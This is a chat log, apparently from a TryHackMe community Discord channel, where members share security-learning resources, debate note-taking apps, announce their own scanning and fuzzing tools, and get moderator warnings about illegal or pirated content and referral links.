balmy merlin
This is the second time as well he has done it IIRC
topaz gulch
If it's a vulnhub box with writeups there then it's less of an issue, tbf. Still technically against the rules though 🤷♂️
rain carbon
This lady from the conference I'm attending made this, and I thought some of y'all may benefit from this too ^_^
https://breanneboland.com/blog/2020/01/27/how-an-sre-became-an-application-security-engineer-and-you-can-too/
faint sluice
wow I've been in security for 16? years, first time I've heard of SheSecurity 🙂
rain carbon
I kinda love it :3
faint sluice
yeah, that site has a lot of good resources in general
azure widget
seems fairly new but could be an interesting c2 alternative https://github.com/bats3c/shad0w
fervent summitBOT
Rule 9: No discussion of illegal topics or actions.
spare vapor
🥺
tepid patio
@spare vapor I'm going to have to formally warn you. I've told you to stop politely, but what you're asking for sounds incredibly suspicious and you're breaking rule 9. You have no reason to know that information. Please stop, and familiarise yourself with #rules to stop this from happening again 😄
balmy merlin
Also if your friend did lose their phone they would have used find my iphone or find my device with android
spare vapor
Plz can I get the strictly prohibited group instructions or Rule plzz?
I wanna to read again.
odd quest
Also if your friend did lose their phone they would have used find my iphone or find my device with android
This is the only correct answer here
shut ferry
is it cherrytree really buggy for everybody?
azure widget
Cherry tree is no longer supported
I would use another note taking platform like notion or Joplin
wait did they start back up support for cherry tree I thought it was deprecated...
topaz gulch
Last I checked there were still updates coming out @azure widget
It's KeepNote that's deprecated
That said, if CherryTree is abandoned, I will take it up myself
azure widget
Ahhh yes keepnote was what I was thinking of
gritty barn
cough. Joplin
proven bramble
I'll help you @topaz gulch
topaz gulch
Ey
spiral zodiac
I've been using CherryTree as well recently, so 😁
faint sluice
I've started using OneNote, although I've been trying to use OneNote for years at work with not much success, I do like the organization
fringe spire
i just started using cherrytree and you guys are telling me it's broken? 
gritty barn
JOPLIN FOR THE LOVE OF GOD
queen wyvern
It's not broken per se. It's not the best either (just my thoughts)
Why didn't you start with notion or joplin
fringe spire
i was using leafpad/sublime text before. recently started using cherrytree.
queen wyvern
Have you tried notion yet ?
fringe spire
no
spiral zodiac
i just started using cherrytree and you guys are telling me it's broken?
@fringe spire CherryTree isn't broken!
fringe spire
@fringe spire CherryTree isn't broken!
@spiral zodiac well it's not broken for me either 🤷♂️
faint sluice
Joplin looks nice, its not enough to sway me from OneNote but looks solid
topaz gulch
CherryTree is easily the best if you want functional @fringe spire
The only thing it lacks is sync features, but github sorts that out pretty nicely.
If you want something pretty, use Joplin or Notion. If you want something functional, use Cherrytree
proven bramble
If you want something M&M (Muir and Mayor) approved, use CherryTree
topaz gulch
(Just ignore Dark with his Notion fanaticism)
spiral zodiac
!dark
fervent summitBOT
DarkStar7471
low ermine
Why is no one recommending VS Code + Markdown :'(
honest dock
Joplin gang 
topaz gulch
Because CherryTree 😁
tepid patio
Why is no one recommending Vim Wiki?
prime mantle
XMind + subl
flint basin
a newbie questions, for web directory enumeration, what would be the advise on doing this better? eg. first use gobuster, dirbuster, dir check if any additional learn, then switch to another set of wordlists.
tepid patio
a newbie questions, for web directory enumeration, what would be the advise on doing this better? eg. first use gobuster, dirbuster, dir check if any additional learn, then switch to another set of wordlists.
@flint basin this is more of a #general question 🙂
flint basin
oops, got it. thanks mate
lament hound
Can someone link a website where I can download gobuster? I’m using gobuster because I have watched many videos on gobuster and ik how to use it
prisma bison
faint sluice
sudo apt-get install gobuster
lament hound
i cant get gobuster to install? anyone know how?
tepid patio
i cant get gobuster to install? anyone know how?
@lament hound what OS?
lament hound
windows
tribal gull
This wasn't posted here before but it's basically a single place for snippets related to THM (leaving sub-only rooms, listing running VMs etc.)
https://github.com/thm-community/snippets
if you have any ideas/snippets to contribute then make an issue :D
edgy plank
Why is no one recommending VS Code + Markdown :'(
@low ermine you can hire me for that if you want
sturdy shell
I wanna throw that into the bot
Probably a help.tryhackme.com article and then just add it as a docs topic in the bot owo
civic halo
@sturdy shell I wanna throw you into the bot 😉
calm ermine
woeful pumice
Second Post in the Red Team Tools series(https://hashnode.com/series/red-team-tools-ckcr88zo800depgs16jt0asjf): https://tropyl.com/information-gathering-with-recon-ng
fossil star
@tribal gull can you please share the tool which you use to take notes while solving boxes and creating your write ups?
tribal gull
i usually just use vscode and markdown files
for my writeups i use jekyll with markdown files
fossil star
thanks
tribal gull
no 
white pivot
What kinds of secret scripts you have?
white pivot
Make them public :p
tribal gull
i don't know where they are
queen wyvern
lies
prime mantle
Make a http server on your root. We'll find them.
faint sluice
Any recommended vscode plugins? I added vim, ssh and rdp but need more recs
Oh and I have the python ones
icy marsh
lyric roost
Hey Guys! I am new to InfoSec. Can you guys suggest me some good study material on Bug Bounty and some InfoSec stuff in general? I just started doing THM.
balmy merlin
This was in the bug bounty channel posted by dark which is a bunch of bug bounty writeups that may help what you’re looking for
@lyric roost ^^
vague flower
i'm new to mobile app pentesting. any good resources/tutorials/courses/labs?
white pivot
Don't know how helpful it'd be, a friend of mine asked for something like this so I am sharing it here too.
white pivot
For the time being, I'll try to push more of my notes to it.
buoyant sparrow
At the risk of starting a war. What advantages do a notetaking app such as notion or cherrytree have over just writing in markdown in vscode?
gritty barn
YOU DARE SAYING THAT
OMG
OMG
jk dude, it's just personal preference
i use joplin
buoyant sparrow
Remember, there are no stupid questions, only stupid people 🙂
spiral zodiac
gritty barn
lol haha
topaz gulch
Cherrytree is best
gritty barn
nah, it doesn't really make a difference each of us has their own preferences
odd quest
Notion do cloud sync
buoyant sparrow
So not many advantages to using joplin or cherrytree over vscode?
odd quest
cloud sync go brrrrrr
gritty barn
Joplin does cloud sync too
topaz gulch
But the answer is that any of them give you a more structured method
gritty barn
i'm sorry Muir but you are at a loss here
but there are masochists around here that use vimwiki
gritty barn
you're meh
topaz gulch
It does the job
buoyant sparrow
I do love vim....... But I just use vim keybindings in vscode
gritty barn
Joplin >
topaz gulch
Vim > *
topaz gulch
It really doesn't though
odd quest
I really like Notion. The admins like Notion
gritty barn
you pick 1 small thing over 100 better options
you stay stuck in the past. some of us progree
topaz gulch
Neither of those offer a decentralised approach to notes
I use a different Notebook for everything I do
I don't want them all clumped in one workspace
topaz gulch
That's your disorganisation 🤷♂️
odd quest
topaz gulch
See, that just looks messy to me
odd quest
They're grouped like that, and you get a nice cover page
topaz gulch
Still looks messy
buoyant sparrow
It seems like most ppl like CT, Joplin, Notion > VSCode
I was just trying to figure that part lol
topaz gulch
You started a war 😆
gritty barn
gritty barn
i have my work stuff there too
topaz gulch
Is that not eCPPT, Chev?
topaz gulch
smh
gritty barn
thanks tho
buoyant sparrow
And no love for OneNote or Evernote it seems, everyone here uses apps I hadn't heard of before, I was just wondering what these apps in particular have that appeal to the pentest community
gritty barn
evernote got breached on multiple occasions
there's google keep note too
i use that for my shopping basket
buoyant sparrow
Ahh, so that makes sense why security ppl don't like that. Yea, I uses google keep all the time for lists
Pretty much if it is a disposable list, keep is the way to go for me. But if you want to actually keep and organize it, it is missing a bit
gritty barn
agreed
it's down to personal preference
i like centralised stuff, so i go for joplin
topaz gulch
CherryTree ftw
gritty barn
muir is muir so he likes KeEpInG sTuFf SePaRaTeD
vs code looks nice with the neon backlit fonts
buoyant sparrow
Personal preference to a degree. I mean it seems the serious ppl gravitate to 3 apps and eschew the rest. Kind of like no one who codes in notepad despite it being pre-installed
gritty barn
i do code in notepad ++
buoyant sparrow
y tho
gritty barn
like for quick stuff
odd quest
I use IDLE for python still
gritty barn
just cba to install ssms or whatever else needed
buoyant sparrow
Still, vscode loads just as fast and is much better
I used IDLE light mode for the first 2 years of pythoning...... My eyes thank me for switching
topaz gulch
Vim
odd quest
I use vscode for anything above about 20 lines
topaz gulch
Vim ftw
odd quest
Anything that I'll use more than once
buoyant sparrow
Do Joplin, Notion, and CherryTree all have a dark mode? Bc that is a dealbreaker for me. I know that is kind of like hating a car for not having enough cup holders but it is what it is
odd quest
Notion does for sure
gritty barn
yes. joplin has
odd quest
I couldn't get Joplin's working right on Windows
gritty barn
a few versions of dark mdoe to be fair
buoyant sparrow
Vim is an acceptable choice for editor 🙂 Emacs, Atom, Sublime, Vim, and Vscode are the big ones
topaz gulch
Emacs, ew
buoyant sparrow
I have vscode with vim keybindings and atom themeing 🙂
I agree emacs ewww but it is still a more popular choice than notepad++ or idle....
gritty barn
and you got keyboard bindings too fyi
topaz gulch
IDLE is good if you don't have Vim
gritty barn
yes
topaz gulch
Cherrytree, if you please
proven bramble
^
buoyant sparrow
Does CT have vim keybindings?
odd quest
I tried them all and settled on Notion
buoyant sparrow
Uh oh, nano guy is here
proven bramble
Eww vim
odd quest
it's a matter of giving them a go and seeing what you like
gritty barn
against you with vim
topaz gulch
Because you're switching teams every five minutes depending on whether we're talking about CT or Vim 😆
gritty barn
that's for certain
proven bramble
I'm never with you on Vim. EVER.
topaz gulch
🤣
proven bramble
And perl
topaz gulch
I got Vim onto Windows today.
proven bramble
perl FTW
topaz gulch
Oh, yeah, definitely
buoyant sparrow
Does Notion or Cherrytree have vim keybindings?
tepid patio
notion does
proven bramble
Are we talking pumpkin spice latte basic?
faint sluice
no, but editing options
buoyant sparrow
while wearing ugg boots, yoga pants and a north face jacket basic?
proven bramble
Yep. That basic.
odd quest
no, but editing options
@faint sluice You can do a lot
I can't show you 90% of it because it's THM stuff
faint sluice
the interface didn't show much when I downloaded it
odd quest
faint sluice
you need to do HTML tags?
odd quest
Yeah the interface doesn't show a lot straight away, but the shortcuts and options are good
No
That's a code snippet
With HTML highlighting
faint sluice
ahh ok
daring hull
I don't really know where else to drop this, but I think it's important this doesn't get buried.
VMWare will be seeing a price drop ($250->$199 for new licenses) with VMWare 16, releasing in October. Workstation and Fusion will also be set at the same price. What's nice is that people who have bought VMWare Workstation Pro or Player 15.5 after August 15th are being given keys to VMWare Workstation 16. If you're planning on buying a VMWare Workstation license soon, but not needing it immediately, it might be worth holding out to save $50. No news on if VMWare for Education will see a further price drop.
https://blogs.vmware.com/workstation/2020/08/announcing-workstation-16-and-fusion-12.html
daring hull
Looks to be a course/challenge meant to help you learn Linux over a month. Could be worth checking out for people who want to level up their confidence with Linux.
faint sluice
spiffy, I was planning on buying vmware but don't need it
violet ridge
I made a multi threaded web fuzzer that can look for http codes or strings in responses
still beta but enjoy
sturdy shell
that's definitely getting a star (:
uncut ether
Hey Guys I want to start with web application penetration testing. Any good resources/practice places ?
fallow wraith
what kind of web apps
prime mantle
OWASP top 10 room on THM. @uncut ether
uncut ether
Yeah I've done that
But a bit more of web apps
Especially XSS , SQLI and All that.
gritty barn
There's burp academy as well
gritty barn
wrong chat
slender pumice
tepid patio
Hey! Some major QoL updates with RustScan in the last month since I posted 🥳 😄
+ No longer Dos' the server by default (but still fast, just not 30k ports / second by default fast)
+ Now supports multiple IP address scanning
+ Windows support
+ Linux static binary (Windows is being worked on)
+ Randomised port ordering (no more sequential scans!)
+ Host resolution (can now use domain names as hosts)
+ New Docker image (thank you Cmnatic <3 )
+ Specify which ports to scan
+ Added a link to admin.tryhackme.com (the most important feature by far)
gritty barn
@tepid patio does it support multiple ip ranges?
craggy onyx
SELinux System Administration, Second Edition, by Sven Vermeulen. Published in 2016.
tepid patio
Not cybersec (this channel topic doesn't say required) but you can get books in their original serial format via email (Great Expectations was published weekly in a newspaper, experience it like that) https://www.serialliterature.com/
azure widget
naive crow
I don’t know why every Time I scan with RUSTSCAN my network stops.
azure widget
you’re probably not specify your batch file correctly
I prefer to use the docker container for it
I find it to be a lot more stable
naive crow
Good idea I will try that. Thank you
tepid patio
Also wrong channel 😛
violet ridge
I added an extensions argument so it can now fuzz for files too, and hope you all bare with me while it’s still in beta and let me know if any issues/typos
@tepid patio that image
tepid patio
oh thats called a social share card its in the settings of the repo
violet ridge
face palm ty
Oh and I hated u for the 24hours I spent faffing making the new readme lol
Happy(er) with it now tho 🙂
tepid patio
I like it! Nice blue lines 😄
ebon valve
ebon valve
Exam notes template I created: https://www.notion.so/OSCP-Exam-Notes-EXAM_DATE-cb9d15436e4849339aaa35979d582735
gritty barn
@ebon valve do you have a .md of them :c
ebon valve
You can dup it and download them all as md's :D
Notion has an export as markdown file function
gritty barn
i don't use notion lolol
odd quest
booo
ebon valve
You should, its amazing
tribal gull
meh
gritty barn
joplin
tribal gull
i can do it in a sec if you want
gritty barn
hardstuck joplin
tribal gull
i want to go through it anyway
gritty barn
oki dokes, plz do
ebon valve
I'll link this on my website soon as well
tribal gull
gritty barn
ty ty ❤️
tribal gull
the filenames are a bit wonky because why not but looks good
ebon valve
Nice :)
gritty barn
but that's a thing for tomorrow it's 2 am now
tribal gull
i want to put the modified oscp report markdown template on github soon™
it's just the old markdown one with multifile support and pagebreaks
gritty barn
i still need to finish off the thm api -> joplin integration
tribal gull
👀 that sounds interesting
gritty barn
yeah, joplin has an api where you can insert stuff
i read into it and played around for a bit
but didn't get a chance to finish it off
faint sluice
Notion says api coming soon
odd quest
They have an import function already
faint sluice
oh look what I found, just what I need a learning tracker https://www.notion.so/1c16409723844c49991a48e85da49133?v=76850219650d4a178db52367bef3fab7
sturdy shell
OSCP reports in LaTeX pls
spiral zodiac
👀
sturdy shell
I will genuinely use LaTeX for mine
queen wyvern
So writing a report for oscp is somewhat similar to writing a writeup for a challenge?
queen wyvern
oh look what I found, just what I need a learning tracker https://www.notion.so/1c16409723844c49991a48e85da49133?v=76850219650d4a178db52367bef3fab7
@faint sluice The reason notion is the best
shut ferry
"ASPIRING HACKERS! Want to learn to hack? Since it's virtual anyways, we're opening our Fall 2020 ASU Computer Systems Security / CTF course to the WHOLE WORLD! More info, including lecture times, youtube/twitch/presentation links, and practice problems"
- Arizona State University
tiny compass
tepid patio
@signal jolt there is no way that's legal please refer to the #rules :) I deleted your message
grim crown
Wanna Learn Malware Analysis and Don't Know Where to Start ? This is the Right Video for You ! https://youtu.be/Ooz9-suF2jw
craggy onyx
shut ferry
ceh is old version
fast mural
EHHH STILL CEH
shut ferry
and illegal
odd quest
@fast mural don't post pirated material. This is an official warning under rule 9.
rain carbon
jaunty raven
Which markdown editor is best for linux ? I heard about notion but it's on windows and mac
jaunty raven
Then what about typora and atom ?
prisma bison
Stegkraken Version v0.0.1 is out!
Hate waiting for stegcracker to finish rockyou after 28 hours? Well wait no more!
Stegkraken is a tool based on speed and efficiency for steganography, and this is only version one!
Written in pure rust :p
Created by @tepid patio and I
haughty minnow
I haven't looked at the course or content yet, so cant say if tis any good, but might be of interest to some people. Practical Buffer Overflows for OSCP course on Udemy currently free, not sure for how long. https://www.udemy.com/course/practical-buffer-overflows-for-oscp/?couponCode=FREEMYBUFFER
spiral zodiac
prisma bison
That’s pretty cool
sturdy shell
Yeah I saw that last night
Guy intently went all the way around disclosing it to Microsoft :/
sturdy shell
That sounds a bit sketchy, least not you included your reference/invite code with it. If that offer is legitiimate from EC Council, you can simply state that. Please don't share reference/invite codes to services and sites @balmy tangle
balmy tangle
It had a free coupon and it’s hacking resources, i think it belongs here, I’m not associated with EC Council in any way, someone shared this on a different server, and I thought it can belong here for me and to anyone to get the coupon
shut ferry
Sorry bud
your up.viral link redirected to try.eccouncil.org
you could've just linked the try.eccouncil.org link
oh
yea- even better catch
prisma bison
But I'm going to delete all my screenshots as this is resources :p
shut ferry
Fair enough, I'm not a moderator but be aware of referral links and how people take advantage of it
prisma bison
Beep Boop
shut ferry
Hopefully you weren't one of the people trying to take advantage of other people for free stuff 😉
balmy tangle
sturdy shell
No harm no fowl (:
balmy tangle
I got it from this person minutes ago
shut ferry
sorry bud
balmy tangle
Yes, cause I went there and I created my own coupon
I wouldn’t share someone else referral link
Is there like a rule to not share referral links to courses coupons?
prisma bison
If it's for personal gain it is against the rules
sturdy shell
If you benefit from it in some description, it falls within Rule 3
balmy tangle
I’m not associated with that website/service in any way, I just thought i can share it here for me to get the free courses and people to maybe do the same way.
prisma bison
Just always check the links you're sending. As CMN said "No harm no fowl", I'm not a mod but I promise you you're not in trouble and we should just move past it (in my opinion) :D
balmy tangle
I’m really on phone, it’s a bit late and I’m tired to check anything now is the link a scam or what?
prisma bison
Its a pyramid scheme :/
balmy tangle
So EC Council = bad?
prisma bison
It seems so
balmy tangle
Okay, I’ll take your word
azure widget
wow wow wow @prisma bison @balmy tangle EC-Council is not bad. I mean CEH is outdated but whatever that’s something completely different. The link was an upvir.al link that definitely does not sound like an EC-Council link
spiral zodiac
...
shut ferry
I mean the CEH is basically a pyramid scheme EC Council is a legit organization with recognised certifications, especially by the US DoD
proven bramble
The CEH is only still accepted in 8570 because a boat load of current contractors would become ineligible as that's all many of their employees have ever done. Far better certifications now meet the equivalent standards in the policy.
prime mantle
Yesterday Mayor declared a PG13 abuse: You are CEH'd
median cove
does anyone know a website or something that has a bunch of useful commands and things with explanations of what they do? i’ve done a bit of digging and can’t really find much
cloud brook
commands for what?
rain carbon
@median cove Do you know linux well?
rain carbon
That'd a good starting point honestly. You'll want to be comfortable with the command line. Know how to navigate directories, grep, find, things like that.
The Learn Linux room might be helpful
rain carbon
Ah gotcha. I think the Linux Room may be helpful for you.
I just don't know what you know so its hard to give exact advice 🙂
median cove
should i bother finishing the room that it gives you to start With?🤣
median cove
i hope so i’m gonna feel real dumb if i’m not
rain carbon
i think its helpful having file sharing set up on VMs. I'm just letting you know this since its not often talked about - in the usual set ups I've seen.
Like people kinda just assume you know about this feature, or are focused on just getting the vm set up 🤷♀️
median cove
i’m unfamiliar with how to do that
median cove
vb
rain carbon
But ya, you'll wanna finish the welcome room since it sets up your vpn. The VPN will be used to access other rooms if you wanna keep doing THM.
So you'll just google virtual box file sharing
🤷♀️
balmy tangle
wow wow wow @prisma bison @balmy tangle EC-Council is not bad. I mean CEH is outdated but whatever that’s something completely different. The link was an upvir.al link that definitely does not sound like an EC-Council link
@azure widget the link was generated by EC Council.
shut ferry
The worst thing is not being able to be creative with a CTF you’re trying to make :/
I just want a good way for someone doing my CTF to privesc from one user to another :(
sweet dagger
Hopefully this is relevant and a good place to share this.
https://twitter.com/paul_masek/status/1301730574768496641?s=20
I have an exciting project that I've been working on and would like to release to the public. First, 99% of the credit for this little project goes to the Detections Podcast and the hosts of the show, Shawn Thomas, Michael Jenks, and Charles Shirer.
I have taken the "detections" portion of their podcast and put it into a structured YAML file format complete with titles, descriptions, timestamps, references, ATT&CK URLs, and ATT&CK tags.
My hope is that this will be a nice trove of detections for security people to use for threat hunting as well as for rules in their SIEMs, IDSs, IPSs, EDRs, etc.
The logical next step that one could do is take these formatted detections and contribute new Sigma rules where none exist currently.
I have just done the first episode and it can be used as a template for the others. I and whoever else are moderators will review/accept pull requests for new YAML file submissions. The GitHub repo is https://github.com/itpropaul/Detections-Podcast-Detections
Twitter
fiery bear
any linux priv esc learning resources?
prisma bison
You can try looking at this
fiery bear
Thank you
ebon valve
shrewd ginkgo
faint sluice
awesome
spiral zodiac
https://twitter.com/jonasLyk guy leaking windows 0day's on his twitter, take it with a grain of salt, since he claims he has 100,000$ worth of them 🤷
Twitter
arctic mist
he's been around for a hot minute -- I wouldn't be surprised if he actually has more than that
night holly
If his story is true, can’t say I blame him.
daring hull
Whew that’s spicy
stuck flax
topaz gulch
Love the fact HTB is in there but THM isn't in the THM Discord server 🤣
shut ferry
haahha fuck i think posted wrong servers haha fuck
topaz gulch
No problem 🙂
Try to watch the profanity please though 😄
shut ferry
haaha yess very sorry
spiral zodiac
Love the fact HTB is in there but THM isn't in the THM Discord server 🤣
@topaz gulch I saw that and was like
shut ferry
hahah all those servers im getting crazy sometimes
tender parrot
Hi guys whats a good security + test training website to use
odd quest
I'll be honest, Tryhackme?